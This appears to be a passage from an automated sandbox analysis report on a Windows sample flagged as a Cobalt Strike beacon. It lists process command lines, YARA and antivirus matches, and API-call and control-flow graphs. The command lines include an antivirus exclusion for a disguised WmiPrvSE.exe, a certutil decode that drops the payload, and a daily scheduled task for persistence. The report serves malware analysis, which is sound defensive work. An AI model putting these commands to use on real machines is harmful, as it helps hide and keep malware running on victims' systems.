                                        Start time:04:49:16
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6ee680000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:17
                                        Start time:04:49:16
                                        Start date:04/08/2024
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                        Imagebase:0x350000
                                        File size:433'152 bytes
                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:18
                                        Start time:04:49:16
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6ee680000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:20
                                        Start time:04:49:17
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -command "Add-MpPreference -ExclusionExtension 'C:\Users\Public\WmiPrvSE.exe'"
                                        Imagebase:0x7ff6cb6b0000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:21
                                        Start time:04:49:19
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\certutil.exe
                                        Wow64 process (32bit):false
                                        Commandline:certutil -decode C:\Users\Public\NDTCN1.dat C:\Users\Public\WmiPrvSE.exe
                                        Imagebase:0x7ff7dc2e0000
                                        File size:1'651'712 bytes
                                        MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:22
                                        Start time:04:49:19
                                        Start date:04/08/2024
                                        Path:C:\Windows\System32\schtasks.exe
                                        Wow64 process (32bit):false
                                        Commandline:SchTasks /Create /SC DAILY /TN WmiPrvSE /TR "C:\Users\Public\WmiPrvSE.exe" /ST 19:00 /f
                                        Imagebase:0x7ff6527d0000
                                        File size:235'008 bytes
                                        MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:23
                                        Start time:04:49:19
                                        Start date:04/08/2024
                                        Path:C:\Users\Public\WmiPrvSE.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\Public\WmiPrvSE.exe
                                        Imagebase:0x400000
                                        File size:328'704 bytes
                                        MD5 hash:29FA5E4FD104FD12A870D2DD90E42B31
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                        • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                        • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                        • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                                        • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                        • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                        • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000017.00000002.3865003625.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                        • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                        • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                        • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                        • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                                        • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                        • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000017.00000002.3870282650.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 88%, ReversingLabs
                                        Has exited:false

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:5%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:3.7%
                                          Total number of Nodes:375
                                          Total number of Limit Nodes:9
                                          execution_graph 55639 637a0 55640 637ac 55639->55640 55641 637e4 55639->55641 55640->55641 55643 63590 55640->55643 55644 6359d 55643->55644 55647 ce06e 55644->55647 55646 635aa RtlAllocateHeap 55646->55641 55648 ce0b5 RaiseException 55647->55648 55649 ce088 55647->55649 55648->55646 55649->55648 55650 79d20 CoInitializeEx 55651 79d5d 55650->55651 55652 79da9 55650->55652 55721 77790 144 API calls 3 library calls 55651->55721 55661 74e30 55652->55661 55656 79d76 55722 cb520 GetCurrentThreadId EnterCriticalSection LeaveCriticalSection __Mtx_unlock __Cnd_broadcast 55656->55722 55660 79d7f codecvt 55662 74e43 Concurrency::cancel_current_task 55661->55662 55663 74e5a 55661->55663 55668 ce06e Concurrency::cancel_current_task RaiseException 55662->55668 55664 74e80 55663->55664 55723 748e0 79 API calls 55663->55723 55666 74ea6 55664->55666 55724 749b0 79 API calls 55664->55724 55667 74ecc 55666->55667 55725 74a10 79 API calls 55666->55725 55673 74ef2 55667->55673 55726 74a70 79 API calls 55667->55726 55668->55663 55669 74e71 55674 ce06e Concurrency::cancel_current_task RaiseException 55669->55674 55671 74e97 55675 ce06e Concurrency::cancel_current_task RaiseException 55671->55675 55678 74f18 55673->55678 55727 74ad0 79 API calls 55673->55727 55674->55664 55675->55666 55676 74ebd 55680 ce06e Concurrency::cancel_current_task RaiseException 55676->55680 55679 74f3e 55678->55679 55728 74b30 79 API calls 55678->55728 55684 74f64 55679->55684 55729 74b90 79 API calls 55679->55729 55680->55667 55681 74ee3 55685 ce06e Concurrency::cancel_current_task RaiseException 55681->55685 55690 74f8a 55684->55690 55730 74bf0 79 API calls 55684->55730 55685->55673 55686 74f09 55687 ce06e Concurrency::cancel_current_task RaiseException 55686->55687 55687->55678 55688 74f2f 55692 ce06e Concurrency::cancel_current_task RaiseException 55688->55692 55691 74fb0 55690->55691 55731 74c50 79 API calls 55690->55731 55696 74fd6 55691->55696 55732 74cb0 79 API calls 55691->55732 55692->55679 55693 74f55 55697 ce06e Concurrency::cancel_current_task RaiseException 55693->55697 55701 74ffc 55696->55701 55733 74d10 79 API calls 55696->55733 55697->55684 55698 74f7b 55702 ce06e Concurrency::cancel_current_task RaiseException 55698->55702 55699 74fa1 55704 ce06e Concurrency::cancel_current_task RaiseException 55699->55704 55703 75022 55701->55703 55734 74d70 79 API calls 55701->55734 55702->55690 55708 75048 55703->55708 55735 74dd0 79 API calls 55703->55735 55704->55691 55705 74fc7 55709 ce06e Concurrency::cancel_current_task RaiseException 55705->55709 55736 74510 79 API calls _unexpected 55708->55736 55709->55696 55710 74fed 55714 ce06e Concurrency::cancel_current_task RaiseException 55710->55714 55711 75013 55715 ce06e Concurrency::cancel_current_task RaiseException 55711->55715 55714->55701 55715->55703 55716 75039 55718 ce06e Concurrency::cancel_current_task RaiseException 55716->55718 55717 7505a 55719 ce06e Concurrency::cancel_current_task RaiseException 55717->55719 55718->55708 55720 75069 55719->55720 55721->55656 55722->55660 55723->55669 55724->55671 55725->55676 55726->55681 55727->55686 55728->55688 55729->55693 55730->55698 55731->55699 55732->55705 55733->55710 55734->55711 55735->55716 55736->55717 55737 ccdab 55738 ccdb7 ___scrt_is_nonwritable_in_current_image 55737->55738 55763 cc985 55738->55763 55740 ccdbe 55741 ccf11 55740->55741 55752 ccde8 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 55740->55752 55808 cd34d 4 API calls 2 library calls 55741->55808 55743 ccf18 55801 dabb2 55743->55801 55747 ccf26 55748 cce07 55749 cce88 55774 cd468 GetStartupInfoW codecvt 55749->55774 55751 cce8e 55775 7daf0 CoInitialize DefWindowProcW 55751->55775 55752->55748 55752->55749 55804 d73b1 57 API calls 4 library calls 55752->55804 55764 cc98e 55763->55764 55810 ccfe0 IsProcessorFeaturePresent 55764->55810 55766 cc99a 55811 d02c0 10 API calls 2 library calls 55766->55811 55768 cc99f 55769 cc9a3 55768->55769 55812 db564 55768->55812 55769->55740 55772 cc9ba 55772->55740 55774->55751 55871 7dda0 55775->55871 59334 da99a 55801->59334 55804->55749 55808->55743 55809 dab76 23 API calls std::locale::_Setgloballocale 55809->55747 55810->55766 55811->55768 55816 e4ed1 55812->55816 55815 d02df 7 API calls 2 library calls 55815->55769 55817 e4ee1 55816->55817 55818 cc9ac 55816->55818 55817->55818 55820 de4cf 55817->55820 55818->55772 55818->55815 55821 de4db ___scrt_is_nonwritable_in_current_image 55820->55821 55832 d8c5a EnterCriticalSection 55821->55832 55823 de4e2 55833 e501a 55823->55833 55825 de500 55848 de526 LeaveCriticalSection std::_Lockit::~_Lockit 55825->55848 55829 de511 55829->55817 55830 de4fb 55847 de41f GetStdHandle GetFileType 55830->55847 55832->55823 55834 e5026 ___scrt_is_nonwritable_in_current_image 55833->55834 55835 e502f 55834->55835 55836 e5050 55834->55836 55857 d1c5e 14 API calls __Wcscoll 55835->55857 55849 d8c5a EnterCriticalSection 55836->55849 55839 e5034 55858 d186f 57 API calls _Ungetc 55839->55858 55841 de4f1 55841->55825 55846 de369 60 API calls 55841->55846 55842 e5088 55859 e50af LeaveCriticalSection std::_Lockit::~_Lockit 55842->55859 55844 e505c 55844->55842 55850 e4f6a 55844->55850 55846->55830 55847->55825 55848->55829 55849->55844 55860 ddfca 55850->55860 55852 e4f7c 55856 e4f89 55852->55856 55867 ddd50 6 API calls std::_Locinfo::_Locinfo_dtor 55852->55867 55855 e4fde 55855->55844 55868 dd6f9 14 API calls 2 library calls 55856->55868 55857->55839 55858->55841 55859->55841 55866 ddfd7 _unexpected 55860->55866 55861 de017 55870 d1c5e 14 API calls __Wcscoll 55861->55870 55862 de002 RtlAllocateHeap 55864 de015 55862->55864 55862->55866 55864->55852 55866->55861 55866->55862 55869 da674 EnterCriticalSection LeaveCriticalSection codecvt 55866->55869 55867->55852 55868->55855 55869->55866 55870->55864 55872 7dde4 55871->55872 55873 7ddfd GetCurrentThreadId 55871->55873 55872->55873 56027 cc4b6 55873->56027 55876 79df0 56035 933a0 55876->56035 56028 cc4bb ___std_exception_copy 56027->56028 56029 7db54 56028->56029 56031 cc4d7 codecvt 56028->56031 56034 da674 EnterCriticalSection LeaveCriticalSection codecvt 56028->56034 56029->55876 56032 ce06e Concurrency::cancel_current_task RaiseException 56031->56032 56033 cd34c 56032->56033 56034->56028 56040 638d0 56035->56040 56038 63590 2 API calls 56039 93820 56038->56039 56041 63908 56040->56041 56052 6395c 56040->56052 56055 cc839 EnterCriticalSection 56041->56055 56043 63912 56045 6391e GetProcessHeap 56043->56045 56043->56052 56044 cc839 6 API calls 56046 63976 56044->56046 56060 ccb4b 59 API calls 56045->56060 56054 639e7 56046->56054 56062 ccb4b 59 API calls 56046->56062 56048 6394b 56061 cc7ef EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 56048->56061 56051 639d6 56063 cc7ef EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 56051->56063 56052->56044 56052->56054 56054->56038 56059 cc84d 56055->56059 56056 cc852 LeaveCriticalSection 56056->56043 56059->56056 56064 cc8c1 SleepConditionVariableCS LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 56059->56064 56060->56048 56061->56052 56062->56051 56063->56054 56064->56059 59335 da9d9 59334->59335 59336 da9c7 59334->59336 59346 da843 59335->59346 59361 daa62 GetModuleHandleW 59336->59361 59340 da9cc 59340->59335 59362 daac7 GetModuleHandleExW 59340->59362 59341 ccf1e 59341->55809 59347 da84f ___scrt_is_nonwritable_in_current_image 59346->59347 59368 d8c5a EnterCriticalSection 59347->59368 59349 da859 59369 da8af 59349->59369 59351 da866 59373 da884 59351->59373 59354 daa31 59378 daaa5 59354->59378 59357 daa4f 59359 daac7 std::locale::_Setgloballocale 3 API calls 59357->59359 59358 daa3f GetCurrentProcess TerminateProcess 59358->59357 59360 daa57 ExitProcess 59359->59360 59361->59340 59363 dab27 59362->59363 59364 dab06 GetProcAddress 59362->59364 59366 dab2d FreeLibrary 59363->59366 59367 da9d8 59363->59367 59364->59363 59365 dab1a 59364->59365 59365->59363 59366->59367 59367->59335 59368->59349 59370 da8bb ___scrt_is_nonwritable_in_current_image 59369->59370 59372 da922 std::locale::_Setgloballocale 59370->59372 59376 db3cf 14 API calls 3 library calls 59370->59376 59372->59351 59377 d8ca2 LeaveCriticalSection 59373->59377 59375 da872 59375->59341 59375->59354 59376->59372 59377->59375 59383 dfca3 6 API calls std::locale::_Setgloballocale 59378->59383 59380 daaaa 59381 daaaf GetPEB 59380->59381 59382 daa3b 59380->59382 59381->59382 59382->59357 59382->59358 59383->59380 59384 9c6f1 59415 cd700 59384->59415 59387 82920 3 API calls 59388 9c79b RegEnumValueA 59387->59388 59389 638d0 71 API calls 59388->59389 59390 9c7c1 59389->59390 59391 9c8c6 59390->59391 59417 7cf40 59 API calls 4 library calls 59390->59417 59392 63590 2 API calls 59391->59392 59400 9c8d0 59392->59400 59394 9c7e3 59395 638d0 71 API calls 59394->59395 59396 9c7ec 59395->59396 59396->59391 59397 9c7f6 59396->59397 59398 6c7a0 70 API calls 59397->59398 59399 9c811 59398->59399 59401 9c821 59399->59401 59418 7cf40 59 API calls 4 library calls 59399->59418 59402 9c9ea 59400->59402 59403 9c954 59400->59403 59412 9c95c 59400->59412 59405 967d0 59 API calls 59401->59405 59406 63590 2 API calls 59402->59406 59419 d7929 57 API calls 59403->59419 59408 9c833 59405->59408 59410 9c9f4 59406->59410 59409 967d0 59 API calls 59408->59409 59411 9c843 59409->59411 59413 cc491 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 59411->59413 59414 9c8bc 59413->59414 59416 9c712 RegEnumValueA 59415->59416 59416->59387 59417->59394 59418->59401 59419->59412 59420 985f0 59426 9fe10 59420->59426 59449 98230 59420->59449 59421 9869e 59422 98667 59422->59421 59423 986b8 SetWindowLongW 59422->59423 59423->59421 59427 9fe41 59426->59427 59428 9ff65 59426->59428 59429 9fe4f 59427->59429 59430 9ff23 59427->59430 59428->59422 59464 a7b30 59429->59464 59430->59428 59433 9ff35 EndDialog 59430->59433 59432 9fe5e 59469 98930 GetWindowLongW 59432->59469 59433->59422 59436 638d0 71 API calls 59437 9fe79 59436->59437 59438 9ffac 59437->59438 59439 9fe83 59437->59439 59440 63590 2 API calls 59438->59440 59443 651e0 68 API calls 59439->59443 59441 9ffb6 59440->59441 59492 9ffe0 11 API calls 59441->59492 59444 9fea2 GetDlgItem SetWindowTextW 59443->59444 59486 aecd0 59444->59486 59445 9ffc8 codecvt 59445->59422 59448 9fef9 59448->59422 59450 98244 59449->59450 59451 982e7 59449->59451 59452 9824e 59450->59452 59453 98286 59450->59453 59451->59422 59456 a7b30 8 API calls 59452->59456 59454 982bd 59453->59454 59455 9828d 59453->59455 59454->59451 59458 982c4 DestroyWindow 59454->59458 59455->59451 59457 98298 EnableWindow 59455->59457 59459 9825d 59456->59459 59457->59422 59458->59422 59460 98500 12 API calls 59459->59460 59461 98267 59460->59461 59462 98930 18 API calls 59461->59462 59463 98270 59462->59463 59463->59422 59493 87860 LoadLibraryW 59464->59493 59467 87860 6 API calls 59468 a7b60 SendMessageW SendMessageW 59467->59468 59468->59432 59470 98989 GetParent 59469->59470 59471 98997 GetWindow 59469->59471 59472 989a5 GetWindowRect 59470->59472 59471->59472 59473 98a21 GetParent GetClientRect GetClientRect MapWindowPoints 59472->59473 59474 989b7 59472->59474 59477 98a02 SetWindowPos 59473->59477 59475 989bb GetWindowLongW 59474->59475 59476 989d0 MonitorFromWindow 59474->59476 59475->59476 59479 98a1a 59476->59479 59480 989e0 GetMonitorInfoW 59476->59480 59477->59479 59483 cc491 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 59479->59483 59480->59479 59482 989f6 59480->59482 59482->59477 59484 98a0d GetWindowRect 59482->59484 59485 98aec SetWindowTextW 59483->59485 59484->59477 59485->59436 59487 aecf0 GetWindowLongW 59486->59487 59488 aecfe GetParent 59487->59488 59489 aed03 GetWindow 59487->59489 59490 aed0c 59488->59490 59489->59490 59490->59487 59491 9fec6 CreateThread 59490->59491 59491->59448 59500 a0280 CoInitialize 59491->59500 59492->59445 59494 878bb GetProcAddress 59493->59494 59495 878e4 GetSystemMetrics GetSystemMetrics LoadImageW 59493->59495 59494->59495 59498 878cb 59494->59498 59499 878df 59495->59499 59496 8794c 59496->59467 59497 8793e FreeLibrary 59497->59496 59498->59495 59498->59499 59499->59496 59499->59497 59501 9cfb0 249 API calls 59500->59501 59502 a02ca 59501->59502 59503 a0313 59502->59503 59506 9dda0 85 API calls 59502->59506 59504 a0320 CoUninitialize 59503->59504 59505 a0326 59503->59505 59504->59505 59507 a02e7 59506->59507 59507->59503 59508 9ea70 346 API calls 59507->59508 59509 a0300 59508->59509 59509->59503 59510 a0308 EndDialog 59509->59510 59510->59503 59511 a0210 59512 a021a GetDlgItem SetWindowTextW GetDlgItem SendMessageW 59511->59512 59513 a025b 59511->59513 59512->59513 59514 a00a0 GetDlgItem SendMessageW SendMessageW 59515 a0101 59516 a011a 59515->59516 59517 a012e EndDialog 59516->59517 59518 a013d 59516->59518 59525 9cd80 241 API calls 59518->59525 59520 a0143 59526 9eee0 59 API calls 59520->59526 59522 a014b 59523 a0153 EndDialog 59522->59523 59524 a0165 EndDialog 59522->59524 59523->59524 59525->59520 59526->59522 59527 c9b27 59528 c9a8f 59527->59528 59530 c9dec 59528->59530 59556 c9b4a 59530->59556 59532 c9dfc 59533 c9e59 59532->59533 59540 c9e7d 59532->59540 59565 c9d8a 6 API calls 3 library calls 59533->59565 59535 c9e64 RaiseException 59536 ca052 59535->59536 59536->59528 59537 c9ef5 LoadLibraryExA 59538 c9f08 GetLastError 59537->59538 59539 c9f56 59537->59539 59542 c9f1b 59538->59542 59543 c9f31 59538->59543 59541 c9f61 FreeLibrary 59539->59541 59544 c9f68 59539->59544 59540->59537 59540->59539 59540->59544 59551 ca024 59540->59551 59541->59544 59542->59539 59542->59543 59566 c9d8a 6 API calls 3 library calls 59543->59566 59545 c9fc6 GetProcAddress 59544->59545 59544->59551 59547 c9fd6 GetLastError 59545->59547 59545->59551 59549 c9fe9 59547->59549 59548 c9f3c RaiseException 59548->59536 59549->59551 59567 c9d8a 6 API calls 3 library calls 59549->59567 59568 c9d8a 6 API calls 3 library calls 59551->59568 59553 ca00a RaiseException 59554 c9b4a DloadAcquireSectionWriteAccess 6 API calls 59553->59554 59555 ca021 59554->59555 59555->59551 59557 c9b7c 59556->59557 59558 c9b56 59556->59558 59557->59532 59569 c9bf3 GetModuleHandleW GetProcAddress GetProcAddress DloadAcquireSectionWriteAccess 59558->59569 59560 c9b5b 59561 c9b77 59560->59561 59570 c9d1c VirtualQuery GetSystemInfo VirtualProtect DloadProtectSection 59560->59570 59571 c9b7d GetModuleHandleW GetProcAddress GetProcAddress 59561->59571 59564 c9dc5 59564->59532 59565->59535 59566->59548 59567->59553 59568->59536 59569->59560 59570->59561 59571->59564 59572 ccee0 59581 cd49e GetModuleHandleW 59572->59581 59574 ccee8 59575 cceec 59574->59575 59576 ccf1e 59574->59576 59578 ccef7 59575->59578 59582 dab58 23 API calls std::locale::_Setgloballocale 59575->59582 59583 dab76 23 API calls std::locale::_Setgloballocale 59576->59583 59579 ccf26 59581->59574 59582->59578 59583->59579
                                          APIs
                                          • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?,?,?,0010C72A,?,?), ref: 0006B1A1
                                          • GetCurrentThreadId.KERNEL32 ref: 0006ADFB
                                            • Part of subcall function 000CB321: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,00000000,?,0006B45F,?,00000000,00000000,?,?,?,?,00000000,-00000002), ref: 000CB32D
                                            • Part of subcall function 000CB321: GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000,?,0006B45F,?,00000000,00000000,?,?,?,?,00000000,-00000002,?), ref: 000CB346
                                            • Part of subcall function 000CB321: CloseHandle.KERNEL32(00000000,?,00000000,?,0006B45F,?,00000000,00000000,?,?,?,?,00000000,-00000002,?,D11C52E5), ref: 000CB358
                                            • Part of subcall function 00088580: InitializeCriticalSection.KERNEL32(00129AFC,D11C52E5), ref: 000885BC
                                            • Part of subcall function 00088580: EnterCriticalSection.KERNEL32(?,D11C52E5), ref: 000885C9
                                            • Part of subcall function 00088580: WriteFile.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 000885FB
                                            • Part of subcall function 00088580: FlushFileBuffers.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 00088604
                                            • Part of subcall function 00088580: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,0010DB14,00000001,?,00000000,00090EF1,00000000), ref: 00088686
                                            • Part of subcall function 00088580: FlushFileBuffers.KERNEL32(00000000,?,00000000,00090EF1,00000000), ref: 0008868F
                                          • std::_Throw_Cpp_error.LIBCPMT ref: 0006B224
                                          • std::_Throw_Cpp_error.LIBCPMT ref: 0006B22B
                                          • std::_Throw_Cpp_error.LIBCPMT ref: 0006B232
                                          • std::_Throw_Cpp_error.LIBCPMT ref: 0006B248
                                          • GetCurrentThreadId.KERNEL32 ref: 0006B43E
                                            • Part of subcall function 000638D0: GetProcessHeap.KERNEL32 ref: 00063925
                                          • std::_Throw_Cpp_error.LIBCPMT ref: 0006B54F
                                          • std::_Throw_Cpp_error.LIBCPMT ref: 0006B556
                                          • std::_Throw_Cpp_error.LIBCPMT ref: 0006B55D
                                          • std::_Throw_Cpp_error.LIBCPMT ref: 0006B564
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.1443669495.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true
                                          • Associated: 00000004.00000002.1443205775.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444058604.0000000000127000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000004.00000002.1444226056.000000000012F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_60000_aipackagechainer.jbxd
                                          Similarity
                                          • API ID: Cpp_errorThrow_std::_$File$Thread$BuffersCriticalCurrentFlushSectionWrite$CloseCodeEnterExitHandleHeapInitializeObjectProcessSingleSleepWait
                                          • String ID: ($Launch failed. Error:$Launching file:$Return code of launched file:$appx$msix$msixbundle
                                          • API String ID: 257644201-1889611545
                                          • Opcode ID: 5bb6ce78df7de9dcfed6fd2e301b2851993d33329048150c22ef8faaf33f7ab4
                                          • Instruction ID: b3a41d75d673fff8c85c155cfbf7ed845ffa7f40de12f6b5ad0fe404509a85e6
                                          • Opcode Fuzzy Hash: 5bb6ce78df7de9dcfed6fd2e301b2851993d33329048150c22ef8faaf33f7ab4
                                          • Instruction Fuzzy Hash: 3092B070E00258DFDB24DF64CC55BEDB7B2AF45314F148299E419AB292EB70AE84CF91

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1217 7a1f0-7a26c call 7ae40 call 661c0 1222 7a276-7a2aa call 842c0 call 661c0 1217->1222 1223 7a26e-7a271 1217->1223 1228 7a2b4-7a303 call 661c0 call 84130 call 7af50 call 64f00 1222->1228 1229 7a2ac-7a2af 1222->1229 1223->1222 1238 7a305-7a308 1228->1238 1239 7a30d-7a33e call 64f00 1228->1239 1229->1228 1238->1239 1243 7a347-7a380 1239->1243 1244 7a340-7a342 1239->1244 1246 7a386-7a3b2 CreateFileW 1243->1246 1247 7a47b-7a4bf call 90980 call 913e0 call 7beb0 call 7c2a0 call 9ac40 1243->1247 1245 7a876-7a886 1244->1245 1248 7a896-7a8ba call cc491 1245->1248 1249 7a888-7a88f FindClose 1245->1249 1250 7a3c5-7a3e9 SetFilePointer 1246->1250 1251 7a3b4-7a3c0 1246->1251 1280 7a4c1-7a4dc call 65f70 1247->1280 1281 7a50b-7a53e call 7c370 call 910f0 1247->1281 1249->1248 1255 7a45d-7a46a 1250->1255 1256 7a3eb-7a406 call 85750 1250->1256 1254 7a46d-7a474 FindCloseChangeNotification 1251->1254 1254->1247 1255->1247 1258 7a46c 1255->1258 1264 7a416-7a429 ReadFile 1256->1264 1265 7a408-7a413 call 65340 1256->1265 1258->1254 1268 7a43f-7a453 1264->1268 1269 7a42b-7a42f 1264->1269 1265->1264 1268->1255 1271 7a455-7a458 1268->1271 1269->1268 1273 7a431-7a43d call 9b5f0 1269->1273 1271->1255 1273->1268 1286 7a4f3-7a501 1280->1286 1287 7a4de-7a4ee call 883b0 1280->1287 1292 7a540-7a54b call 661c0 1281->1292 1293 